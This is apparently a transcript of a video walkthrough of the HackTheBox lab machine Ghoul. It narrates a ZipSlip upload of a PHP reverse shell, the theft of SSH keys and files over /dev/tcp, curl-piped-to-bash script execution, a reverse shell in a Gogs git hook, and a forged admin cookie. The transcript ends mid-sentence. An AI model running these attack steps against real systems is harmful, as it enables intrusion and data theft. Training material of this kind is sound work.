What's going on YouTube? This is Ipsec and we're doing Ghoul from HackTheBox. And first thing first, I'm going to make a mistake later on in this box and say it's Naruto themed. It's actually a different manga called Tokyo Ghoul, but I didn't find out about that until after I finished all the recordings, so forgive me there. The box itself is really fun. It can be a bit frustrating with all the docker containers that you have to do lateral movement through, especially when you have to start swimming back through previously compromised docker containers. It definitely sucks getting root and finding out that the flag you seek is in a different castle, but it is pretty real in that sense. It starts off with the very first docker container using ZipSlip to get TOMCAT to extract a PHP web shell onto the Apache HTTP server. You get shell there, you can pop that whole docker container, get root. You find SSH keys and get into the second docker container, which is a desktop machine essentially, and you don't have admin there. But that machine is dual home to talk to a separate network that has GOGS running, which is essentially like a Git repository. You exploit that Git root there, and then view the Git commit history of a project to extract credentials that you go back to the desktop, use those creds to get admin there, and then you notice that a user is SSHing in every like 5 or 6 minutes, and they use a SSH agent when they SSH in, so you can intercept that agent and then use it to swim back upstream. So it's going to sound a little bit complicated, but I'm sure once we do it, it'll make sense. So let's jump in. As always, we start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Ghoul, and then the IP address, which is 10.10.10.101. Can take some time to run, so I've already ran it. Looking at the results, we can see two interesting things. The first thing being there's two different SSHs and two different HTTPs. The HTTPs aren't too interesting because one is HTTPD, the other is TOMCAT. You see that quite often. However, there being two different SSH listeners is definitely interesting. In a corporate environment, this could just mean you hit a NATed IP that points to different boxes. On a HackTheBox machine, it almost always means there's going to be some type of virtualization technology. So looking at the host keys, we can see the host keys are indeed different, so these are different SSH processes. Additionally, the banner for one says it's OpenSSH 7.6p1 Ubuntu 0.1. The other says Ubuntu 0.2. Generally, when dealing with virtualization technologies, I always assume the host is going to be more up to date and the guest is not going to be. And that's just because containers like Docker have become so popular and people just tend not to update the Docker images or Docker OS. So I'm just going to Google the SSH banner and we're going to go to Launchpad and see exactly what release this is. It is Ubuntu Bionic. I'm going to change this to 0.2. And we see this is Ubuntu Bionic as well. So both of them are at least running the same version of Ubuntu. Before we go too much further, I'm just going to start taking notes. In Cherry Tree, I do Control-N to create Ghoul, Control-Shift-N. We're going to label this interesting. And then we'll say SSH listens onto ports. 22 is for Ubuntu 0.1. And 2222 is for Ubuntu 0.2. So when we get a shell, if we get confused, we can always go back to the interesting tab, glance over it, and be like, oh, which one are we in? Are we in port 22 or port 2222? So just some things to help out. Then we also have the two HTTPs, the first one being on Apache HTTPD. The only thing we see is the HTTP title is the aogiri-chatapp, so that's generally not too interesting. On TOMCAT, we see there is authentication required. Without authentication, we get it unauthorized, and the realm is also aogiri, so nothing too interesting. I'm going to start off with just the website because that did not give me an error message. The TOMCAT gave me the 401 unauthorized, and going to the page, we get just looks like a blog. We have designed by Template Monster. That is not really a CMS or anything, so not worth looking into exploits there. I do Control-U to view the source to see if I see things that are common in like Joomla or WordPress. Don't really see that off the bat. We can check out blog, ambition, strength. Going through this, everything so far has been just HTML. I'm going to go right off the bat and start a gobuster. So I'm going to make dir gobuster, and we're going to do gobuster dir for directory brute force, -u for URL, HTTP 10.10.10.101, then -w for word list, user share word list, gobuster, then directory list 2.3 medium, -o for out file, and we'll just do httpd root dir list. Sure. So let that run, and right off the bat, we get a few things. Images, not interesting. Archives and uploads definitely could be. Users also could be. So I'm going to go with archives first. We just get a forbidden, can't access it. Uploads was the second one, can't access that. /users. And we get a PHP login prompt. So this is definitely going to be interesting. And the fact that it's PHP is interesting as well. We can pretty much do our same thing, except add the extension PHP. So I'm going to copy this. Actually, we can just stop this one and do -x PHP. We may want to do a better word list with less things, so it doesn't take as long because we're adding .php to a bunch of things that we assume are directories, but we have time. So we'll let that run. We do have a login prompt, so the first thing I'm going to do is switch to Burp Suite, steal this request, and send it to SQLMap, and then we'll go look probably at TOMCAT. So let's go to Burp. Proxy intercept is on. Log in with admin. Oh man, type that bad. Admin password. Go over to Burp. We can copy request to file, and we want to put this in root HTTP boxes. This is Ghoul, and we can say httpd login.request. And then we can do SQLMap -r http login.request, and we probably want to do --batch, and that will keep that going. So let's go while our Recon is going and check out port 8080. So we can turn burp intercept off, go to port 8080, and this is TOMCAT, so I'm going to try like TOMCAT, admin, just trying all the defaults for TOMCAT, and eventually we get in. Right now I do see a logo, Sierra, going into the source. I'm trying to see if I can figure out what technology this is. We know it's something Java related because of the TOMCAT, but we don't know if it's like any CMS or something. So I'm going to save this image as logo.png. Sure, that is fine. And I'll go to google.com/images. I'm going to do a reverse image search on this to see if we can find it on the web. So if we go to root, downloads, logo, and Google is searching. Wiki, that's not going to be helpful. Collins Dictionary, we do not. So I have no idea what Sierra is or what this framework is that's running this website. Just going around, see if we have anything. It's lorem ipsum everywhere, so indicator that we shouldn't go to these pages since this text is meaningless. If we go back to the home, we can see there is a place to upload images. If we go through this carousel, the middle one is nothing, and the third one is upload zip. So we can upload images or zips. So what I'm going to do is go back to burp, intercept on. Let's just go and try to upload something. Logo.png, upload, and we can send this to repeater. And I also want to quickly go and choose a zip. We'll also do logo.png. Send this one to repeater. Wait, did I do that correctly? No, that's post image. We can drop that. There we go. Post/upload. I'm looking right there. Okay, we can get rid of request 2. We can rename this to upload image, and we can rename this to upload zip. So if we upload an image, they only accept JPEG, so let's try changing this to JPEG, and this, we'll just click go to see if it does it by content type. Does not. Let's try putting in the file name. And it looks like since both content type and file name didn't match, they must be matching on magic bytes. So we'd have to find a JPEG image and look at it. The other thing we have is the zip. So let's check this one out. They only want zip files. And this is something that is tough to find on your own. It's a vulnerability called ZipSlip. And we also have Secret.php there. But I say it's tough. It was easier when this box first came out because the vulnerability had just came out. But these type of vulnerabilities get to be tough to find, like image tragic, things like that, just because it's one of those, it's very hard to enumerate. It's one of the things you just have to try. So ZipSlip is common to find mainly because it's a vulnerability in a library. And a lot of times with some applications, like you have Python virtual env, you may not be uploading your library when you do apt update because it's in a little virtual container tied to the application. So that happens with a lot of like Java websites, Python things, whatnot, that you'll find them using outdated libraries. And Nessus doesn't detect it because it just sees your OS libraries and sees your OS libraries are patched, but your web server may be running a slightly out of date one. And ZipSlip affects a lot of libraries. You can go to this page and read more, but we're just going to use the EvilArc library to test this out. So let's copy this into /opt, git clone, and SQLMap saw nothing. But if we go into EvilArc, we have Python 3, and we can see, oh, it's Python. Actually, before we do this, let's explain what we're doing. So let's go back into HackTheBox's Ghoul. And if you create a zip file, let's make the var www HTML, and we need -p to do parent directory. So if we touch please sub, and we create a tar archive of cvf test.tar and say var, and then I think it's t for listing contents. Boom. We can list the contents of this tar archive and see it's going to create the directory var www, var www HTML, and var www please, HTML please subscribe. What ZipSlip is if we took this and put a .. before this, then we'll now extract to one directory up and then that. So it's very hard for us to create the directory ... So if we do like make dir -- ... we see can't create the directory, it exists. So it's very hard to do this with just command line. What this EvilArc application does is it creates a zip through, I don't know what good word to explain it, but it mainly creates the zip and lets you put anything you want as the file name. So we can easily put that .. to exploit it. So if we do Python EvilArc -h, we need to do -d is for how many, what depth you want to do. We can default to 8, that'll probably be fine. -o, this is a Linux box, so we do Unix. And then -p for path, we want .. Oh, we don't do .. we just want var www HTML. And then the file we want. So we have to get a file. So let's go back into HackTheBox's Ghoul. We can delete test.tar and var. I'm going to locate PHP-Web-Shell. Locate, I think it's cp user share lau. Londonum, yep. And then PHP-Reverse-Shell. This is the one I want. So I'm going to edit this. And then its default IP I don't know what it is set to. 10.2.2.1. Let's just change this to our IP address. So we are 10.10.14.3, I believe. So if we do if config ton 0, we are indeed 10.10.14.3, and we'll listen on port 9001. Okay. So now we can move this to just be rev.php so it's easier referenced. And then I'm also going to create test.php, and this is just going to do an echo statement. And the reason why I'm doing this is if our rev shell doesn't work, we can go to this and see if we can execute PHP code. So this way just means we don't have to upload files twice. We have a test file and a full reverse shell. So check out http ipsec.rocks. So we'll put that as the file. And part of the reason I did that is because I wanted to advertise the new website ipsec.rocks. But now we can go and create this archive. So let's do EvilArc var www HTML, and we're going to put root HTTP boxes ghoul test.php in it, and we're also going to add rev.php. So this is a zip file. So if we do unzip-l evil.zip, we can see it created the zip file, and we have the directory traversal and then our files. So let's go back to this upload thing. Ghoul. We can probably turn burp off. It is off. Zip file. And then opt EvilArc. And then evil.zip. Upload it. It's thinking. Come on, upload. Maybe it's still waiting on a HTTP request. Let's redo that. So upload image. No, we definitely want upload a zip. EvilArc. Upload. There we go. Thank you for contributing. And it says it's uploaded. And the whole reason we did that ZipSlip vulnerability is if you went and tried to find the upload, you wouldn't be able to. So if you did like upload / rev.php, doesn't exist. But if we do rev.php here, it doesn't exist. That's weird. So maybe the depth is wrong. So let's try this again. Let's do a depth of 1 and try this. And this is why I said finding these vulnerabilities can be tough, and it's something you just have to do. If you do like an advanced vulnerability assessment, which is just really a vulnerability assessment done correctly, and look at all the libraries a server uses for its web server, you'd find this relatively easily. So evil.zip, let's upload this. And there we go. So it looks like we just needed a depth of 1. Maybe having all these extras screwed us up. So if we do nc-lvnp 9001 refresh rev.php, we get a shell. We could also have done, test.php. And we see check out ipsec.rocks. So let's keep on going. Actually, let's check out that secret.php thing as well. So we get the reverse shell, see this in gobuster, and check it out. So if we do secret.php, we get a chat, Tatara, Noru, Kaneki, Eto, Kaneki. So we get a bunch of secret chats. Let's go over to Cherry Tree and put usernames. Tatara, Naru, Kaneki. Tatara. Is it Tataro? Tatara. Kaneki. Naru. There's one more, I think. Eto. Okay. And if we look, Naru here is asking Kaneki for access to a remote web server. And it looks like this could be a password. And then he's also saying he made a fake website to upload pictures secretly. So this is probably that TOMCAT thing. So he probably went a little out of order, but I'm guessing this was the TOMCAT thing. User.text with a flag. Hopefully that's not the actual flag. I don't know. But they're also talking about some type of RCE in, let's see. Talking about some type of RCE. So let's just keep on going. If we do python-c, import pty, pty.spawn, bin bash, and then we control-z, stty, raw -echo, fg, enter, and now we have tab autocomplete and everything. I'm just going to go and kill this gobuster because I know there's nothing else interesting there. I'm also going to export term is equal to xterm so I can clear the screen. But the first thing I wanted to do was check where I am. If we do ls-la and /, we see we are indeed in a Docker. I can also go to etc ssh, and then we can look at these host keys. So I'm going to do ssh-keyscan. What is it? I think it's dash. Do I have keyscan? Not that. Keygen. I want -l, and then we want -E, md5, -f, which one we want. Let's do the host RSA public key. SSH-keygen, my bad. Okay. And we can see the host key. So let's go back to our box, less, nmap, ghoul.nmap, search for that string, and we see that is the one on port 22, which is the older version. So let's go back to interesting, and this is the Docker container. This, we still don't know what that is, but at least we got one of them. So let's go see what else we can enumerate. If we do a netstat alnp grep listen, we can see this box is listening on 80 and 8080. Localhost 8005, not exactly sure what that one is. That could be like a Docker thing, but it's also listening on TOMCAT. We can't see what TOMCAT is running as in the netstat output, but I think if we do like ps-ef and then grep TOMCAT, we can see TOMCAT is running as root. So since it's running as root, we can double check what our files are created as. So if we just go to var www html lsla, we can see test.php is created as the root user. So what you could do is use this file upload vulnerability to drop an SSH key as root. So we can try that real quick. Go to ssh-keygen -f. We'll call this Ghoul. Okay, and then cat ghoul.pub. Okay, and this may actually wipe something. Oh, you could do the ZipSlip vulnerability and upload this and be good. Actually, we should be fine. Let's just do it. We'll see. Deal with the consequences later. So let's go back into opt. What is it? EvilArc. And do we have this? We do. So the path we want now is going to be /root/.ssh. And we should name this authorized keys. So let's move ghoul.pub, move root HTTP boxes ghoul.pub to just be authorized keys. And we can do python evilarc o unix depth2 p root.ssh and do keys. So now evil.zip. Let's kill evil.zip real quick. Recreate it. and then unzip-l evil.zip has this. Oh, I did depth of 2. We'll see if this works. I think I did depth of 1 before. But if we go back to 8080, browse evil.zip, upload, and now SSH 10.10.10.101. We probably should go back in our Ghoul directory, chmod 600, Ghoul, sh-i to specify that key, 10.10.10.101. We can log in as root. So this is a shortcut around some steps. So we're going to back out and ignore that we did that and just work from this prompt. So let's exit this and begin our enumeration of the box. We know TOMCAT is on 8080. That's not really too important. The other thing we probably should look at is like find any config files to see if there's passwords there. So if we look at uploads, nothing there. Look at archives, nothing there. We got some JPEGs, that's not too interesting. If we go to users, there is a login.php. So let's look at what login.php is. Starting array, Kaneki, password, naro password, admin, and password. So we got a few creds. So let's go back over to Cherry Tree and go into new thing, creds, and copy this. So paste, and we can get rid of that. Just cleaning this up. Whoops. Like that, that. I just hate this format, so just cleaning it up. Bear with me for a minute. Okay, so we got some creds in this login. We can try logging in to see what happens. We just looks like we get a JPEG. If we look at index.php, doesn't look like we'll get anything, but let's log in for completeness sakes. So users, and then one of the creds we just did, admin ABCDEF. So admin ABCDEF. That's all you get. So nothing too interesting there. Let's go into TOMCAT. I think TOMCAT is generally somewhere in user. Maybe user share, TOMCAT. That's not it. Maybe we can just do locate TOMCAT. We don't have that. Let's see. Find / grep TOMCAT2 dev null. User something. Definitely user share TOMCAT 7. User share TOMCAT 7. And then if we go into web apps, or not web apps, configuration. Let's see, there's TOMCAT-users. And we can see admin, that's what we logged in as. There's one commented out. That is admin, and then the past is test at aogiri-123. So we can also put this in interesting, because we don't know what it goes to, but old password for TOMCAT. So with that being said, we can also look at what other things are here. If we go to, let's run linenum. That sounds like a good thing to do. So cd/opt linenum python-m simple HTTP server, and then we can curl 10.10.14.3 port 8000 linenum.sh pipe to bash. Not found. Let's just nc lvmp 9001 linenum, and then we can do bash dev tcp 10.10.14.3 9001. Can I do it this way? Yep. So thorough tests have been disabled as we saw in the beginning, but this will still run through, and we'll see if we get anything. Now that it's done, let's just go back to the top, search lin enum, and then go through this output. So we can search for this, and then just hit N. Kernel information, not really important. Potentially a kernel privesc, but I like rolling those out as we look through first, just because some of these boxes are old and it's really lame to privesc with something that came out after the box was created. So current user, usernames that previously logged in. So there is an interesting thing. We have root and then Kaneki logging in from 172.20.01, which I believe may be this box. So maybe that's not that interesting. It would be interesting to run this before we did that SSH thing and logged in as root to see if root had a different login. Who else is logged in? No one. Group memberships, no one. Etsy passwd is going to show all the users. We can see that Kaneki, Eto, and Noro have accounts. Permit root login is yes. Environment information, not too interesting. Path, shells, umask, password storage, not too interesting. Cron jobs, just going through, seeing if I see anything that sticks out that's not non-default. Nothing is. IP address 172.20.0.10. So Kaneki, I think, logged in on 20.01, which would be probably the Docker host. So that is the host guy. Not too interesting. ERP history, 172.20.0.1. Again, nothing we couldn't just guess right off the bat. Listening ports, this is netstack connections. We already looked at that. Running processes, not too interesting. Binaries, Etsy init, sudo, Apache. Is looking at SUID files. Nothing looks non-default. And that's pretty much about it. So I'm going to try running this real quick with thorough scans on to see if we get anything better. So let's go lin enum, and what was it? Thorough, then thorough test enabled. I guess we can just do thorough equals 1 to the top. So let's see. Where do we run? Debug info. Wait. Let's just do it here. Thorough is equal to 1. We'll see if this then says thorough test enabled. Bash. Thorough test have now been enabled. So I'm going to let this run. It's going to take a little bit longer. And then we'll see if we get anything else that is interesting. Scan is complete, so let's do the same thing. And then search for that. And kernel, we've seen hostname group, seen memberships, root. Roots can log in. Available shells, let's just make this a bit bigger so we can see it better. Cron jobs, network, name. Doesn't look like anything too interesting right now. Etsy config, system config, sudo. Installed compilers, reading sensitive files, no. Set UID. Can't search a lot of things. It looks like if we set some type of parameter, we can search through config files PHP log at any for text. We do have the ability to listen on a socket probably if we use Python. Not listen, capture network traffic. And that's it for that. So nothing too interesting in lin enum. Let's just manually look at things. If we go into var backups, we do have a backups directory. And in that, we have files like note.txt, sales.xlsx. I wonder if that's in like .bash history. No. you'd probably have to find do this via find command and search for dates around the time the web server was running. If we go over www.html, you can see the web server was created on December 13th. And then the data in var backups is also December 13th. So this was doing a little bit of forensics, which is always handy during test, to go and find things you want. So what you could do is be like, okay, well, we know the web server was created and deployed on December 13th. What else was deployed on December 13th? Did they create a backup of the old web server before deploying the new one? I don't know. So maybe they would run a command like find / to find all the files in the root directory, and then -newer-mt. And this is going to show files modified after. We want December 12th, 2018, or yeah, December 12th, 2018, because the file was created December 13th. And then we do exclamation point because we don't want this next flag to match. So newer-mt 2018 1214. So we're looking at files modified after December 12th, but before December 14th. We're going to do type F to specify only files, and -ls to show us a bunch of other good information. And then, oh, it's going to put me over here. All I'm going to do here is to dev null, and this is going to say, hey, error messages go into dev null. So running this, it probably wants no spaces there. Dev null like that. There we go. And we can see all the things ran, and this is not going to work because this is Docker, and looks like Docker created everything when it spun up. So we don't really get good file creation times, at least around December 13th. So that sucks. I'm actually not sure how to find var backups other than just a lot of infosec on the box. When I did this, I had used the TOMCAT file upload to SSH in as root that we showed earlier. So let's look at the files. We can look at note.txt, and these files are from remote server ethereal, will be saved here. This makes no sense to me, so we can ignore that. That's another box that I think the same box creator created. Sales.xlsx and important.pdf, we can copy them, but I don't think I have OpenOffice installed, so it's not going to really help. I don't feel like installing it right now. So we'll make dir docker uploads, and then we can do nc lvnp 9001, and all you do is like cat important pdf to dev tcp 10.10.14.3 9001. Oh god, that screwed up my terminal. 10.10.14.3 9001. There we go. And I probably should direct this to a file. So direct it to important.pdf, run this again, and it's getting the file. It should close out when it's done. Let's see, we can tail-f. Yep, it just took a while to run. So we can do nautilus period and try opening this important.pdf. Doesn't open. If we wait, file root HTTP, okay. I saw Docker and I was like, wait, did this upload from that? But I forgot I put Docker in this path. If we MD5 sum the file and go up to here, MD5 sum important, it's the same MD5 sum, so this PDF is just corrupt. You could run like exif tool on it and see if it has any metadata, maybe who created it. That could be a hint, but I'm going to ignore that. If we go into keys, we have a few keys, eto, kaneki, and noro. So if we cat eto, we get a private key. So let's just send all these. Go back to this. We'll do eto.key. And then we will cat this, direct it to dev tcp 10.10.14.3 9001. Sent. So now let's do kaneki.key, and I can cat that pipe. I'm going to hit Alt period, which cycles through the previous arguments I've used. And dev TCP is the last one, so I don't have to keep typing that again. I also don't have to put it on my clipboard. Edo, Kaneki, and Noru. So let's do NORO. I think that's the last one. Cat. Yep. Did not hit enter. Okay, we got all the keys, so now we can begin using them. So if we do SSH, or we can do chmod 600 ETO. We can just do star.key. Or we'll do star and remove important.pdf. So SSH-I ETO 10.10.10.101. See if we log in. Permission denied. We could do -p 2222. Log in. Permission denied. We can try kaneki.key. And we need a passphrase. So I could show you how to crack this with John, but I've already done that before and I'm lazy. I don't want to show it again. Instead, I'm going to use this to say, hey, you should check out ipsec.rocks, where you can search for topics on videos and get links to everything. So if you do crack SSH, you can see we've done it in this machine, which I think is Pinky's. I got the machine name wrong there. It's Pinky's something, probably Pinky's Castle version something. But links you to the description, and if you go to YouTube and look at the link in the bottom right or bottom left, it links you to the exact spot in the video. So if you want to figure out how to crack SSH keys, go there. Otherwise, we're going to go back to our usernames, and Kaneki on secrets.php set a password. And we're going to try this password, and we don't get in, but it didn't say a decryption error. So if we enter the wrong passphrase, we get that. So let's try not on port 2222, just here. And oh, with all these, I probably should have been specifying the username instead of root. ETO at connection closed, port 2222, connection closed. So let's try Kaneki. So that's what I was doing wrong. Enter the passphrase, and we can log into this box as Kaneki, and we get a few things. We have two note files, a secret.jpg and user.txt. So if we cat notes, we see he set up a file server into the server's network. If you need to transfer files, you can use my PC, direct message me for access. So if we do note.txt, vulnerability in GOGS was detected. I shut down the registration function. Please ensure that no one gets access to test accounts. So this note is telling us, hey, they found a vulnerability in one of the websites called GOGS. And in order to fix it, they shut down the registration function. And there's probably still a vulnerability in it because they don't want anyone to get access to the test accounts. So the vulnerability probably just requires authentication. So we can copy this and put it in interesting. And then we're going to hunt for GOGS. So interesting, notes.txt, probably a authenticated RCE. So good way to find this will be just to write a bash script, because I don't think nmap is on the box. They're not that kind. Netcat's not on the box either. NCAT, nope. So let's just do a bash script. So we can do scan.sh, bin bash, for I in sequence 255. This is just going to print out everything. So if we do echo I here and done, we can bash scan and we get it printed out. So what we're going to do is ping -c1 -wait1. This is going to be a delay. The IP address, I think it's 172.20. 172.20.0.10. So let's do 172.20.0i. And the reason why I skipped 1 is because we know 1 exists. That is the host, a gateway, and probably what's on 2222. Actually, we should be able to test that real quick. SSH-key scan. Do we have that? We do. So we can do 172.20.0.1. And then if we do an SSH key scan on -p2222, 10.10.10.101, let's see. This one's the smallest. So ED25519. Maybe this is not. Ubuntu 02.01. So these are still different hosts. Because we're definitely not 01, we are 010. So probably a second Docker container, since 2222 is not matching 0.1. And 0.1 is definitely going to be the gateway, which is the host. So let's just finish this. We're going to ping this, and we can send everything to dev null. So that's going to send standard out and standard error to dev null. And then if the exit code is equal to 0, then we will echo 172.20.0 online and the if statement, and that is a script. So if this ping fails, the exit code is going to be 1, which means the box is offline. If the exit code 0, that means the box is online. So bash scan.sh, and we're probably going to have to wait around 254 seconds. We see that 172.20.0.150 is also online, so let's go and try logging in. Let's go docker uploads, and then ssh-i, kaneki.key, kaneki at 10.10.10.101, and copy the password, paste it, log in, and then if we try SSH 172.20.0.150, did we just connect to ourselves? Exit? It just died on us. So definitely did not work. SSH-key scan. What is it? 172.20.0.150. We can look at, let's see. This is for Ubuntu 0.1. And I'm going to, let's do this in a different terminal window. Let's open a whole new pane so we can split it this way. So the first thing I'm going to do, SSH-key scan, 10.10.10.101. And let's log in. So go to Docker uploads, ssh-i, kaneki.key, kaneki at 10.10.10.101. Copy this password again. Paste. SSH-key scan. 172.20.0.150. We can see these are definitely different. This one ends in SKGA. This one ends in FHCW. And if we tried -p for 2222, maybe it wants it beforehand. We see this is definitely different because it's a different Ubuntu OS. So this is a new box. And when we try to log into it, SSH-v, 172.20.0.150, we get authentication, nothing else. So one other good file that is slowly being phased out is authorized keys. And what I mean by slowly being phased out is I don't think it shows usernames anymore. Let's look at cat.ssh authorized keys. Do I not have it here? Don't have it. but we see a username of kaneki-pub. So it's essentially doing a hash of this now. So you don't get this information, I believe. But this is always good to see because we see an additional username. We have Kaneki, and then we also have Kaneki_pub. So if we try using that username, SSH-I, kaneki-pub at 172.20.150, -I, we don't do -I. The passphrase, it's going to be this I love Tuka, and we can log into this box. So we just had the wrong username. So now we're on 172.20.150. So if we do ls, there is a to-do, and it says give aogiri-test user access to eto for git. If we do up-an, we can see there is another network, 172.18.0.1. And if we, let's see, if config, we got 172.18.0.200. So we may just want to scan this 172.18 network again. We can do netscan, netstat-alnp, grep listen, and we see we're not really listening on any ports. So probably should run this network scanner on this box. So if we cat scan.sh, we can grab this. And what we also could do is SSH key scan 172.18.0.1 and 172.20.0.1. And we can see both .1s are indeed the same box. So let's vscan.sh. We should set mode to paste. Set mode paste. Set paste. There we go. We need to edit the 20s. So let's change this to 18. And then we can change this to 18 as well. We can do bash scan.sh. And we see 172.18.0.2 is online. So can I kill that? Okay. Let's copy scan to portscan.sh. And we can try, let's do echo 1 to dev tcp 02/I. Let's see if this works. I actually don't know if it'll work. We can do 2I online. And we can say for I and 22. That should be fine. Bash port scan. Let's just get rid of this loop. And 2, 3, 4, 5, 6, 7, 8. I can probably just do DW. Yep. And then comment that. And we'll change I to 1. So we'll see if this works. chmod plus x, portscan.sh, 22, online, 23, connection refused, awesome. Not sure why we're getting this. Echo 1. I'm not sure why we're getting those error messages. Probably to dev null. Whoops. To dev null. There we go. So now if we do 22, we can see it's open. And you can try a lot of ports. If you Googled, GOGS's default port is 3000. So that's the one you want. You could also try all the SSH keys to get into 22. That wouldn't work as well. For time's sake and not just typing a bunch of things, we're just going to go straight to port 3000. The issue is we want to get to this from our local box, but this Docker container is not now accessible. So what we have to do is we have to create tunnels. So we will go from, we can just do it here, Kali to, we'll call this HTTP to, I don't know what box this is. We can call this the Bastion host to GOGS. So we have to create tunnels to do this. And if you're not familiar with tunnels, highly recommend watching the Reddish video, REDDISH. But if you are familiar, this should be easy. So I'm just going to exit all these terminals, and we can go back to our main SSH session. So we can exit that. We can clean this up. Eventually I'll want that. Not yet. So we're on this host. So what I'm going to do is I'm going to hit enter and then shoot. I'm going to hit enter and then squiggly C. And that's going to open the SSH command prompt. So enter squiggly C. If you don't know about that, you can just Google like SSH Konami code and then go to a SANS page. Really good blog post. But we're going to do a local port forward, which means we're going to listen on our box. Let's listen on, we'll do 5001. And then we're going to direct this to 172.20.150 on port 22. Okay, so now on our box, whoops, let's do this split. Actually, let's do it this way. So now on our box, if we SSH-P to 5001 on localhost, lowercase p, we are now going to 172.20.150. So let's do -i. This is going to be the Docker uploads, kaneki.key, kaneki at localhost. And the passphrase, let's grab it out of here, paste it, connection closed. Oh, kaneki_pub is this guy's username. Paste it, and we're logged in. So now we can do the same thing, squiggly C, -L. We can say, listen on port 3000, and we will direct it to 172.18.02 on port 3000. So now we have a tunnel that is listening on our port 3000 and will go to 172.18.02 3000. So if we just go to Firefox 127.0.0.1 3000, we can see GOGS. So we know the registration function was disabled from, I believe, the Secret.php. We read it somewhere that said it was disabled. We can see that GOGS is from 2018 based upon the copyright. You also get the version number. So the first thing to do is look for that RCE they talked about. So SearchSploit GOGS, if we do -x and look at this, scrolling, we see the timeline. This is 2014. Probably not going to be 2014 since we saw the copyright was 2018. And it is now year 2019, so we know the copyright isn't dynamically created based upon the date. So, whoops. Let's look, see if this one is also 2014. Disclaimer. Severity level, let's see. This is also 2014. So SearchSploit isn't going to be too much help for us right here. So the next place to look is probably the CVE database. So CVE search, this is going to be like search CVE-MITRE.org, whatever this is. Search for GOGS, and we can see all the various CVEs. I'm going to pick this one first, just because it allows remote code execution, as demonstrated by .session file. But if you search this, you can find blog posts. Here's a Git that is in Chinese. If you translate the page, you can get a better description. Here's the blog post it was translated from, also in Chinese. I'd recommend reading through this after you use Google Translate. If you open this page up in Chrome, you'll have a translate button and it will be pretty easy to read. But this is essentially what we are going to be doing. So let's go back into the GitHub and we'll copy the exploit code. So this is what we want. We'll call this cookiegen.go. Set paste, paste it in. And for this exploit to work, we're going to need a, valid login. So just put this on the back burner and we can try to sign into GOGS. If we remember, there was a note somewhere, I think it was on this guy, cat to do, give aogiri test user access to. So this is giving this account to Eto for Git. So this is giving me the account name. And then way back, there was a TOMCAT config that we put under interesting. Old password for TOMCAT, test at aogiri123. And based upon the note, aogiri test, chances are this could be a valid password to try. If we try sign in, we are good. So if we go through this, unfortunately, it's a pain to go through the translate page. So essentially, I'm going to step through that page, except it won't be stepping through it. So we're going to create a new repository, and we're going to give a repository a name. So it can be private, doesn't have to be. Let's do please subscribe. And then the description is going to be privesc. Git ignore. I don't think we have to put something. I just am. README, don't have to, but this initialize, we need to make sure that is checked, unless it'll just make things a little bit more difficult. Invalid CSRF token. That's annoying. Go back here, and let's log in again. I think there's something weird with this box, maybe one of these self-healing things that forces you to log out so constantly, and it gets really annoying, but oh well. Please subscribe, test, click something, initialize repo. Okay, and we want to upload a file. So what we're going to do is use this Go code to create a cookie. So go run cookiegen. Cannot use ocreate. Type in. Maybe this is because of a wrong Go version. Let's go to line 28. 28. Let's see. Doesn't look like it likes these variables. We'll do 644. So that's just a chmod number. Whoops. And I'm not sure if it wants quotes. 654, sure. Go run cookiegen. We don't use OS anymore. Okay, so that works. So this created a Go serialized object, maybe Go serialized object. Created a Go object. We look at data, you can see what it is. And we want to upload this file. So I'm going to refresh this page because it's probably logged me out. It actually didn't. Awesome. So upload a file. Let's do Nautilus, period. And we want to drag our file, which is data, to be uploaded. Can be anything, commit changes. Okay, so we got our file there. Now, the vulnerability allows us to do a directory traversal to this file. So if we go into our Firefox, I just hit F12, go to the storage tab, go to our cookies. I like GOGS. And this is going to be the default path for things. And before we do that, we need to look at our ID. If we look at where /fork is, our repo ID is 2, and that is going to be what we use. So we want to go up one directory and then go into, I think, temp, and then data-repo/2/data. So what we just did was go up one directory, puts us in temp, go into, I think it's local-repo/2. I think this is it. Maybe it's data/, we'll see. But do a directory traversal. If this file exists, then this I like GOGS will execute the file and we'll be good. So save that, refresh, and the page worked. And if we look now, we are Kaneki. So let's save this and show what happens if we didn't do this, because I forgot to show you that. So save that. Let's delete all cookies and log in again. So aogiri test, save this, log in. So if we go to this repo, do settings, we only have the options collaboration branches, webhooks, deploy keys. If we're in an admin on this box, which we do by this exploit, then we'll get a additional one called Git Hooks. And this will execute commands whenever something is done. So if we do update bin-sh, we can run commands here. So let's do this bin-sh, and we will say bash-i 0. Let's do bash. We'll do reverse shell cheat sheet. And I think it's bash-i 0 at and 1. Let's see. Bash-i. There we go. This is what we want. So this attacking IP, this will be 10.10.14.3, port 9001. Let's make sure we are listening. So NC LVNP 9001. Update the hook. Invalid CSRF token. Let's try this again. It's probably because I like navigated different tabs. Paste 10.10.14.3 9001. Update hook. There we go. So now whenever a git update is ran, it will execute this script, which will then send us a shell, hopefully. So let's go back to please subscribe. We'll do new file and commit the change. Nothing. Let's try, can we update it? Go back here. Edit this file. Please check out ipsec.rocks and support me on Patreon. So now we are updating this file. And we'll see if this then triggers it. Nothing. So let's see. We probably screwed up the Git hook somewhere. So let's go back into settings, webhooks, not webhooks, Git hooks, update, bin-sh. Let's try bash-c and then this. So this is probably not in bash shell. This is probably in just shell and didn't have access to that functionality. So I'm just doing bash-c. We could also probably just rename it to bin bash up there. So we'll try both. Update the hook. Okay. Let's go back to please subscribe. We can edit this and support me on Patreon. Of course, subscribe on YouTube. Commit. It's not responding right away. That's a good sign. because we have a shell, so that won't finish until our shell dies. So let's do python-c, import pty, pty.spawn, bin bash, python command not found, python3, import pty, pty.spawn, bin bash, python3 not found. We could use script as well. So let's make sure it exists on the box with which, and script is not there as well. So we just can't get a proper TTY on this box easily. Let's run lin enum. So let's do, I guess, up here. Do we have curl? We do have curl. So we can do make dir dub cd dub cp opt lin enum sh here, and we can do curl 10.10.14.3 port 8000 lin enum.sh python-m simple http server, and we probably should execute it. So curl 10.10.14.3 8000 lin enum sh pipe to bash. There we go. So now our checks are running, and then once this finishes, we can go see what there is. There were just a ton of files that went through, and right off the bat, I see something interesting here on SUID files, user sbin gosu. So let's go take a look at what this is. We can search for GTFO bins and see if it knows what gosu is. It does not. Gosu Linux. Simple Go-based set UID program. So gosu user command it looks like. So let's try gosu root bash ID, and now we are root cd home, and we have a 7-zip file now. So not yet at root. We cat session.sh. We get a username, password, Kaneki and 12345. I love Toku. So let's copy this, put this in creds, Kaneki, this, okay, and let's send this zip file to 